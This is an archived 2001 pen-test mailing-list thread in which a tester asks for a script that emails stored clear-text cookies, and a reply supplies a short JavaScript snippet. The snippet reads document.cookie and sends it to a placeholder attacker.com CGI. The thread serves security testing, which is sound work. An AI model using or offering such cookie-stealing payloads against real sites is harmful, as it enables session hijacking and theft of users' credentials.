Re: Wanted: Script to email cookies

From: Jeremiah Grossman (jeremiah@whitehatsec.com)
Date: 12/01/01 

Message-ID: <00e801c17a4b$0d30c380$5a16a8c0@nonehzukwf658a>
From: "Jeremiah Grossman" <jeremiah@whitehatsec.com>
To: "Joe Brown" <joe_brown@senet-int.com>, <pen-test@securityfocus.com>
Subject: Re: Wanted: Script to email cookies
Date: Sat, 1 Dec 2001 18:32:09 +0900

Well. of course there is the ever famous sniffer....
that will see a cookie quite easily.... to move cookies
off domains without the aid of a sniffer.... JavaScript has
been known the be the most widely used method.

something like

<SCRIPT>
var cookie_data = document.cookie;
window.open('http://www.attacker.com/email_the_cookie.pl?cookie_value=cookie
_data');
</SCRIPT>

Modify to suit your needs...

The point is that your using JavaScript to generate an off domain request
method
passing out the cookie data to a cgi.

good. good.

Jeremiah Grossman

----- Original Message -----
From: "Joe Brown" <joe_brown@senet-int.com>
To: <pen-test@securityfocus.com>
Sent: Friday, November 30, 2001 6:06 PM
Subject: Wanted: Script to email cookies

>

>
>
>
> I'm working on a pen test for a web application. After
> the first time you successfully authenticate, the app
> stores a cookie with username and password in clear
> text. I've recently read the archive regarding
> vulnerable IE browsers revealing cookies. I'd like to
> go a step farther. Does anyone have a script that will
> email the cookie? I'd like to craft an email with a link
> and when a user clicks, it emails the cookie. I want
> to show the client how dangerous it is to store a clear
> text cookie. Also, any other method of cookie stealing
> would be really appreciated. Thanks.
>
> Joe
>
> -------------------------------------------------------------------------- 

--
> This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please
see:
> https://alerts.securityfocus.com/
>

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Relevant Pages

  • RE: XSS LAB DEMO IDEAS
    ... Once you have the cookie, you need to identify an URL on the target web ... server that will allow you to access the goodies. ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
  • Re: Wanted: Script to email cookies
    ... >stores a cookie with username and password in clear ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
  • Wanted: Script to email cookies
    ... Subject: Wanted: Script to email cookies ... stores a cookie with username and password in clear ... This list is provided by the SecurityFocus Security Intelligence Alert ... For more information on SecurityFocus' SIA service which ...
    (Pen-Test)
  • Re: Wanted script to email cookies
    ... Wanted script to email cookies ... stores a cookie with username and password in clear ... This list is provided by the SecurityFocus Security Intelligence Alert ...
    (Pen-Test)
  • IE dot bug - Sandblad advisory #7
    ... Initially reported to Microsoft about the dot bug vulnerability. ... Microsoft released patch: ... Files in the cookie directory are not treated as beeing in the ... Remote webpage can script in local zone" ...
    (Bugtraq)